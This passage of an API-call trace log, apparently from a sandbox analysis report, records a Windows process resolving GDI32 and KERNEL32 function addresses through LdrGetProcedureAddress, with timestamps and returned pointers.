DestinationString=0x326f97c, SourceString="GetCharABCWidthsW" | out: DestinationString="GetCharABCWidthsW") [0199.351] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetCharABCWidthsW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ceec6) returned 0x0 [0199.351] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetBrushOrgEx" | out: DestinationString="SetBrushOrgEx") [0199.351] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetBrushOrgEx", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c9541) returned 0x0 [0199.351] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateFontIndirectW" | out: DestinationString="CreateFontIndirectW") [0199.351] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateFontIndirectW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c5c19) returned 0x0 [0199.351] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="EnumFontsW" | out: DestinationString="EnumFontsW") [0199.351] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="EnumFontsW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cc97d) returned 0x0 [0199.352] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextFaceAliasW" | out: DestinationString="GetTextFaceAliasW") [0199.352] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextFaceAliasW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c9a1c) returned 0x0 [0199.352] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextMetricsW" | out: DestinationString="GetTextMetricsW") [0199.352] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextMetricsW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c82b2) returned 0x0 [0199.352] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextColor" | out: DestinationString="GetTextColor") [0199.352] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextColor", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca705) returned 0x0 [0199.352] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiGetCodePage" | out: DestinationString="GdiGetCodePage") [0199.352] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiGetCodePage", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c8a96) returned 0x0 [0199.352] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextCharset" | out: DestinationString="GetTextCharset") [0199.353] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextCharset", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c9e52) returned 0x0 [0199.353] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetBkMode" | out: DestinationString="GetBkMode") [0199.353] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetBkMode", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c901a) returned 0x0 [0199.353] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetViewportExtEx" | out: DestinationString="GetViewportExtEx") [0199.353] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetViewportExtEx", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c81c8) returned 0x0 [0199.353] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetWindowExtEx" | out: DestinationString="GetWindowExtEx") [0199.353] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetWindowExtEx", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c823f) returned 0x0 [0199.353] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiGetCharDimensions" | out: DestinationString="GdiGetCharDimensions") [0199.354] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiGetCharDimensions", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c9e6c) returned 0x0 [0199.354] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiPrinterThunk" | out: DestinationString="GdiPrinterThunk") [0199.354] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiPrinterThunk", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766fb69c) returned 0x0 [0199.354] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiLoadType1Fonts" | out: DestinationString="GdiLoadType1Fonts") [0199.354] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiLoadType1Fonts", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ed4cc) returned 0x0 [0199.354] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiAddFontResourceW" | out: DestinationString="GdiAddFontResourceW") [0199.354] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiAddFontResourceW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ecf67) returned 0x0 [0199.354] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="TranslateCharsetInfo" | out: DestinationString="TranslateCharsetInfo") [0199.354] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="TranslateCharsetInfo", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6143) returned 0x0 [0199.354] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SaveDC" | out: DestinationString="SaveDC") [0199.355] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SaveDC", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6e05) returned 0x0 [0199.355] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="OffsetWindowOrgEx" | out: DestinationString="OffsetWindowOrgEx") [0199.355] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="OffsetWindowOrgEx", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca643) returned 0x0 [0199.355] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RestoreDC" | out: DestinationString="RestoreDC") [0199.355] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="RestoreDC", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6ead) returned 0x0 [0199.355] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="ExtTextOutW" | out: DestinationString="ExtTextOutW") [0199.355] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="ExtTextOutW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c8b7a) returned 0x0 [0199.355] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetDIBits" | out: DestinationString="GetDIBits") [0199.355] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetDIBits", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6001) returned 0x0 [0199.355] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateDIBSection" | out: DestinationString="CreateDIBSection") [0199.356] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateDIBSection", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cac46) returned 0x0 [0199.356] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetStretchBltMode" | out: DestinationString="SetStretchBltMode") [0199.356] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetStretchBltMode", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7180) returned 0x0 [0199.356] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SelectPalette" | out: DestinationString="SelectPalette") [0199.356] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SelectPalette", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c5a86) returned 0x0 [0199.356] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RealizePalette" | out: DestinationString="RealizePalette") [0199.356] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="RealizePalette", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb001) returned 0x0 [0199.356] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetDIBits" | out: DestinationString="SetDIBits") [0199.357] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetDIBits", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7590) returned 0x0 [0199.357] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateDCW" | out: DestinationString="CreateDCW") [0199.357] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateDCW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ce743) returned 0x0 [0199.357] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateDIBitmap" | out: DestinationString="CreateDIBitmap") [0199.357] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateDIBitmap", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7217) returned 0x0 [0199.357] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateCompatibleBitmap" | out: DestinationString="CreateCompatibleBitmap") [0199.357] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateCompatibleBitmap", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c5f49) returned 0x0 [0199.357] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetBitmapBits" | out: DestinationString="SetBitmapBits") [0199.357] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetBitmapBits", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb0be) returned 0x0 [0199.357] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="DeleteDC" | out: DestinationString="DeleteDC") [0199.358] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="DeleteDC", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c58b3) returned 0x0 [0199.358] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiValidateHandle" | out: DestinationString="GdiValidateHandle") [0199.358] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiValidateHandle", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c5e5c) returned 0x0 [0199.358] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiDllInitialize" | out: DestinationString="GdiDllInitialize") [0199.358] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiDllInitialize", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6368) returned 0x0 [0199.358] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiProcessSetup" | out: DestinationString="GdiProcessSetup") [0199.358] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiProcessSetup", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6668) returned 0x0 [0199.358] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetStockObject" | out: DestinationString="GetStockObject") [0199.358] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetStockObject", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c4eb8) returned 0x0 [0199.359] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateSolidBrush" | out: DestinationString="CreateSolidBrush") [0199.359] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateSolidBrush", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c4f17) returned 0x0 [0199.359] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateCompatibleDC" | out: DestinationString="CreateCompatibleDC") [0199.359] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateCompatibleDC", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c54f4) returned 0x0 [0199.359] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiConvertBitmapV5" | out: DestinationString="GdiConvertBitmapV5") [0199.359] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiConvertBitmapV5", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766f1a9c) returned 0x0 [0199.359] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiCreateLocalEnhMetaFile" | out: DestinationString="GdiCreateLocalEnhMetaFile") [0199.359] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiCreateLocalEnhMetaFile", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76700d8e) returned 0x0 [0199.359] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiCreateLocalMetaFilePict" | out: DestinationString="GdiCreateLocalMetaFilePict") [0199.360] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiCreateLocalMetaFilePict", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76700d73) returned 0x0 [0199.360] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetRgnBox" | out: DestinationString="GetRgnBox") [0199.360] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetRgnBox", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb6aa) returned 0x0 [0199.360] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CombineRgn" | out: DestinationString="CombineRgn") [0199.360] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CombineRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca903) returned 0x0 [0199.360] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="OffsetRgn" | out: DestinationString="OffsetRgn") [0199.360] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="OffsetRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb3d4) returned 0x0 [0199.360] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="MirrorRgn" | out: DestinationString="MirrorRgn") [0199.360] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="MirrorRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766f5f79) returned 0x0 [0199.360] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="EnableEUDC" | out: DestinationString="EnableEUDC") [0199.361] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="EnableEUDC", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76706e13) returned 0x0 [0199.361] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiConvertToDevmodeW" | out: DestinationString="GdiConvertToDevmodeW") [0199.361] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiConvertToDevmodeW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766d26ed) returned 0x0 [0199.361] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextExtentPointA" | out: DestinationString="GetTextExtentPointA") [0199.361] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextExtentPointA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ced52) returned 0x0 [0199.361] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextExtentPointW" | out: DestinationString="GetTextExtentPointW") [0199.361] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextExtentPointW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c9500) returned 0x0 [0199.361] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateBitmap" | out: DestinationString="CreateBitmap") [0199.361] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateBitmap", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c5d53) returned 0x0 [0199.361] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetTextAlign" | out: DestinationString="SetTextAlign") [0199.362] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetTextAlign", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c8401) returned 0x0 [0199.362] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextAlign" | out: DestinationString="GetTextAlign") [0199.362] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextAlign", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7fd5) returned 0x0 [0199.362] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="IntersectClipRect" | out: DestinationString="IntersectClipRect") [0199.362] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="IntersectClipRect", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7dc4) returned 0x0 [0199.362] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SelectObject" | out: DestinationString="SelectObject") [0199.362] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SelectObject", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c4f70) returned 0x0 [0199.362] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetBkMode" | out: DestinationString="SetBkMode") [0199.362] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetBkMode", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c51a2) returned 0x0 [0199.362] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetBkColor" | out: DestinationString="GetBkColor") [0199.363] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetBkColor", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca5f4) returned 0x0 [0199.363] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetObjectW" | out: DestinationString="GetObjectW") [0199.363] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetObjectW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6c3a) returned 0x0 [0199.363] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetTextColor" | out: DestinationString="SetTextColor") [0199.363] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetTextColor", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c522d) returned 0x0 [0199.363] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetBkColor" | out: DestinationString="SetBkColor") [0199.363] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetBkColor", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c52d8) returned 0x0 [0199.363] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetLayout" | out: DestinationString="GetLayout") [0199.363] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetLayout", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7c90) returned 0x0 [0199.364] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="StretchDIBits" | out: DestinationString="StretchDIBits") [0199.364] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="StretchDIBits", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7435) returned 0x0 [0199.364] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetDeviceCaps" | out: DestinationString="GetDeviceCaps") [0199.364] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetDeviceCaps", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c4de0) returned 0x0 [0199.364] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetDIBColorTable" | out: DestinationString="GetDIBColorTable") [0199.364] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetDIBColorTable", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c73b3) returned 0x0 [0199.364] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiGetBitmapBitsSize" | out: DestinationString="GdiGetBitmapBitsSize") [0199.364] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiGetBitmapBitsSize", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c73e0) returned 0x0 [0199.364] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="DeleteObject" | out: DestinationString="DeleteObject") [0199.365] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="DeleteObject", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c5689) returned 0x0 [0199.365] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="DeleteMetaFile" | out: DestinationString="DeleteMetaFile") [0199.365] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="DeleteMetaFile", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cef9e) returned 0x0 [0199.365] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="DeleteEnhMetaFile" | out: DestinationString="DeleteEnhMetaFile") [0199.365] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="DeleteEnhMetaFile", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766d2c80) returned 0x0 [0199.365] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiConvertMetaFilePict" | out: DestinationString="GdiConvertMetaFilePict") [0199.365] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiConvertMetaFilePict", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76700c97) returned 0x0 [0199.365] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiConvertEnhMetaFile" | out: DestinationString="GdiConvertEnhMetaFile") [0199.365] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiConvertEnhMetaFile", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76700d0c) returned 0x0 [0199.365] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiReleaseDC" | out: DestinationString="GdiReleaseDC") [0199.366] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiReleaseDC", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c55d3) returned 0x0 [0199.366] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="StretchBlt" | out: DestinationString="StretchBlt") [0199.366] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="StretchBlt", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb895) returned 0x0 [0199.366] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetObjectType" | out: DestinationString="GetObjectType") [0199.366] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetObjectType", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c7cfc) returned 0x0 [0199.366] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiConvertAndCheckDC" | out: DestinationString="GdiConvertAndCheckDC") [0199.367] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiConvertAndCheckDC", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb770) returned 0x0 [0199.367] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetRectRgn" | out: DestinationString="SetRectRgn") [0199.367] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetRectRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca785) returned 0x0 [0199.367] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="BitBlt" | out: DestinationString="BitBlt") [0199.367] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="BitBlt", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c5ea6) returned 0x0 [0199.367] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="TextOutW" | out: DestinationString="TextOutW") [0199.367] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="TextOutW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cd41c) returned 0x0 [0199.367] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="TextOutA" | out: DestinationString="TextOutA") [0199.368] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="TextOutA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ceda3) returned 0x0 [0199.368] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="PatBlt" | out: DestinationString="PatBlt") [0199.368] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="PatBlt", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb21d) returned 0x0 [0199.368] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetLayoutWidth" | out: DestinationString="SetLayoutWidth") [0199.368] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetLayoutWidth", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766e855b) returned 0x0 [0199.370] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x326f984, Source="KERNEL32.dll" | out: Destination="KERNEL32.dll") returned 1 [0199.370] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x326f9a4 | out: BaseAddress=0x326f9a4*=0x76210000) returned 0x0 [0199.370] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetLocaleInfoW" | out: DestinationString="GetLocaleInfoW") [0199.370] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetLocaleInfoW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76223c42) returned 0x0 [0199.370] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetUnhandledExceptionFilter" | out: DestinationString="SetUnhandledExceptionFilter") [0199.371] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetUnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762287c9) returned 0x0 [0199.371] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="UnhandledExceptionFilter" | out: DestinationString="UnhandledExceptionFilter") [0199.371] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="UnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7624772f) returned 0x0 [0199.371] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="TerminateProcess" | out: DestinationString="TerminateProcess") [0199.371] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7623d802) returned 0x0 [0199.371] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetSystemTimeAsFileTime" | out: DestinationString="GetSystemTimeAsFileTime") [0199.371] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76223509) returned 0x0 [0199.371] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="LoadLibraryExA" | out: DestinationString="LoadLibraryExA") [0199.372] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LoadLibraryExA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76224913) returned 0x0 [0199.372] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="InterlockedCompareExchange" | out: DestinationString="InterlockedCompareExchange") [0199.372] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="InterlockedCompareExchange", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221484) returned 0x0 